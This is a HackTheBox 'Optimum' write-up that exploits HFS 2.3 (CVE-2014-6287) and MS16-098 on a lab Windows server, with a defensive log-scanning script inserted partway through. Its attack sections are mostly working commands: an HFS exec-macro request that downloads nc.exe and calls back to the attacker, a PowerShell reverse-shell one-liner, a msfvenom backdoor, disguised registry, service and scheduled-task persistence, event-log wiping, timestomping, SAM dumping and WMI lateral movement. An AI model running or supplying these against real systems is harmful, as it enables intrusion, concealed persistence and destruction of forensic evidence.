HackTheBox Optimum

Writeup for HackTheBox Optimum

Machine Synopsis

Key Exploitation Techniques:

  • HttpFileServer (HFS) version identification and exploitation
  • Remote code execution via CVE-2014-6287
  • Windows kernel privilege escalation (MS16-098)
  • File transfer techniques for exploit delivery

Reconnaissance & Enumeration

Port Discovery

$ nmap -p- --min-rate 10000 10.10.10.8
PORT   STATE SERVICE
80/tcp open  http

Service Enumeration

$ nmap -p 80 -sC -sV 10.10.10.8
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Web Application Analysis

Accessing http://10.10.10.8 reveals HttpFileServer 2.3 with a file browser interface.

Website

# Check for known vulnerabilities
$ searchsploit hfs 2.3
-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ---------------------------------
HFS Http File Server 2.3.x - Remote Command Execution | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command | windows/remote/39161.py
-------------------------------------------------------- ---------------------------------

Exploitation

CVE-2014-6287 Analysis

HttpFileServer 2.3 contains a remote command execution vulnerability in the search functionality. The flaw is in the findMacroMarker function (parserLib.pas), which is meant to detect HFS macro markers in request input: a null byte (%00) in the search parameter cuts that check short, so a macro such as {.exec|...} placed after it passes through unsanitized and is executed by the server. HFS 2.3c and later fix this.
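As an added example (not code from this writeup or from the HFS project), a small Python detector that scans web access-log lines for the null-byte macro pattern described above, including double-encoded variants. The log lines are constructed samples in Common Log Format and the rule names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (Common Log Format, not from the Optimum box): the first two
# requests carry CVE-2014-6287-style null-byte macro payloads (the second one double-encoded).
SAMPLE_LOG = """\
10.10.14.4 - - [12/May/2021:10:01:02 +0000] "GET /?search=%00{.exec|cmd.exe%20/c%20whoami.} HTTP/1.1" 200 512
10.10.14.4 - - [12/May/2021:10:01:09 +0000] "GET /?search=%2500%257B.exec%257Ccmd.exe%2520/c%2520whoami.%257D HTTP/1.1" 200 512
10.10.10.50 - - [12/May/2021:10:02:30 +0000] "GET /?search=quarterly%20report HTTP/1.1" 200 2048
10.10.10.51 - - [12/May/2021:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

# Client, timestamp and request line; the URI runs up to the protocol tag.
REQ_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<uri>.*?) HTTP/[\d.]+"')
# HFS macro marker: "{." followed by the macro name (exec, save, load, ...).
MACRO_RE = re.compile(r'\{\.\s*(?P<name>[a-z_]+)', re.IGNORECASE)

def decode_uri(uri, rounds=2):
    """Percent-decode up to `rounds` times so double-encoded payloads become visible."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri

def classify_request(uri):
    """Return a rule name if the request looks like HFS macro injection, else None."""
    decoded = decode_uri(uri)
    if MACRO_RE.search(decoded) is None:
        return None
    # The CVE-2014-6287 trigger: a NUL byte that makes findMacroMarker miss the macro.
    if "\x00" in decoded:
        return "hfs-null-byte-macro"
    # A macro in a client-supplied parameter is suspicious even without the NUL byte.
    return "hfs-macro-in-request"

def scan_log(text):
    """Return one finding per suspicious request: source, timestamp, rule and macro name."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if m is None:
            continue
        rule = classify_request(m.group("uri"))
        if rule:
            macro = MACRO_RE.search(decode_uri(m.group("uri"))).group("name").lower()
            findings.append({"src": m.group("src"), "ts": m.group("ts"),
                             "rule": rule, "macro": macro})
    return findings
```

Run `scan_log(SAMPLE_LOG)` to get the two flagged requests; on a real deployment, feed it the reverse proxy or web server access log in front of HFS.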

Exploit Execution

# Copy the Python exploit
$ searchsploit -m 39161
$ cat 39161.py

The exploit expects nc.exe to be hosted on the attacker's web server; the target downloads it and uses it to connect back to the listener:

# Setup web server for nc.exe
$ locate nc.exe
/usr/share/windows-resources/binaries/nc.exe
$ cp /usr/share/windows-resources/binaries/nc.exe .
$ python3 -m http.server 80

# Setup netcat listener
$ nc -nlvp 443
# Execute the exploit against the target (39161.py hard-codes the attacker IP in
# ip_addr and the listener port in local_port; set them to 10.10.14.4 and 443 first)
$ python 39161.py 10.10.10.8 80

Initial Shell Access

C:\Users\kostas\Desktop> whoami
optimum\kostas

C:\Users\kostas\Desktop> type user.txt
d0c39409d7b994a9a1389ebf38ef5f73

Privilege Escalation

System Information Gathering

C:\Users\kostas\Desktop> systeminfo
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 31 Hotfix(s) Installed.

Vulnerability Assessment

# Use Windows Exploit Suggester
$ python windows-exploit-suggester.py --database 2021-05-16-mssb.xlsx --systeminfo systeminfo.txt

[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)

MS16-098 Exploitation

# Download pre-compiled exploit
$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

# Host exploit for download
$ python3 -m http.server 80
# Download and execute exploit
C:\Users\kostas\Desktop> powershell wget "http://10.10.14.4/41020.exe" -outfile "exploit.exe"
C:\Users\kostas\Desktop> exploit.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop> whoami
nt authority\system

C:\Users\kostas\Desktop> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
51ed1b36553c8461f4552c2e92b3eeed

Post-Exploitation Techniques

Persistence Methods

Registry Persistence

# Create backdoor payload
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe -o backdoor.exe

# Transfer to target
$ python3 -m http.server 80
# Download backdoor on target
C:\Users\kostas\Desktop> powershell wget "http://10.10.14.4/backdoor.exe" -outfile "C:\Windows\System32\backdoor.exe"

# Add registry auto-start entry
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "C:\Windows\System32\backdoor.exe"

# Verify persistence
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Updater"

Service Installation

# Create persistent service (using the same backdoor.exe created above)
sc create "SecurityUpdate" binpath= "C:\Windows\System32\backdoor.exe" start= auto
sc start "SecurityUpdate"
sc query "SecurityUpdate"

# Setup handler for backdoor connections
# On attacking machine:
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.4
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

Scheduled Task

# Create system startup task (using the same backdoor.exe)
schtasks /create /tn "SecurityUpdate" /tr "C:\Windows\System32\backdoor.exe" /sc onstart /ru SYSTEM
schtasks /query /tn "SecurityUpdate"

# Test scheduled task execution
schtasks /run /tn "SecurityUpdate"

Defense Evasion

Log Cleanup

# Clear Windows Event Logs
for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

# Clear PowerShell history
del "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

# Clear IIS logs if present
del "C:\inetpub\logs\LogFiles\W3SVC1\*.log"

File Attribute Manipulation

# Hide backdoor files
attrib +h +s C:\Windows\System32\backdoor.exe
attrib +h +s C:\Windows\Temp\exploit.exe

# Timestomp files to match system files
powershell "(Get-Item C:\Windows\System32\backdoor.exe).LastWriteTime = (Get-Item C:\Windows\System32\kernel32.dll).LastWriteTime"

Lateral Movement Preparation

Network Discovery

# Discover network hosts
for /L %i in (1,1,254) do @ping -n 1 -w 100 10.10.10.%i > nul && echo 10.10.10.%i is alive

# Port scanning
powershell "1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect('10.10.10.1',$_)) \"Port $_ is open\"} 2>$null"

Credential Harvesting

# Dump SAM database
reg save HKLM\SAM C:\Windows\Temp\sam
reg save HKLM\SYSTEM C:\Windows\Temp\system

# Search for stored credentials
cmdkey /list

WMI Remote Execution

# Execute commands remotely (if credentials available)
wmic /node:"target_ip" /user:"domain\username" /password:"password" process call create "cmd.exe /c command"

Alternative Exploitation Methods

Manual HFS Exploitation

# Manual command execution via URL encoding
curl "http://10.10.10.8/?search=%00{.exec|cmd.exe /c whoami.}"

# Download and execute payload
curl "http://10.10.10.8/?search=%00{.exec|cmd.exe /c powershell -c \"(new-object System.Net.WebClient).DownloadFile('http://10.10.14.4/nc.exe','C:\\Windows\\Temp\\nc.exe'); C:\\Windows\\Temp\\nc.exe -e cmd.exe 10.10.14.4 443\".}"

PowerShell Reverse Shell

# PowerShell one-liner reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Alternative Privilege Escalation

Watson Enumeration

# Use Watson for privilege escalation identification
Invoke-WebRequest -Uri "http://10.10.14.4/Watson.exe" -OutFile "C:\Windows\Temp\Watson.exe"
C:\Windows\Temp\Watson.exe

PowerUp Enumeration

# Use PowerUp for privilege escalation vectors
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

This post is licensed under CC BY 4.0 by the author.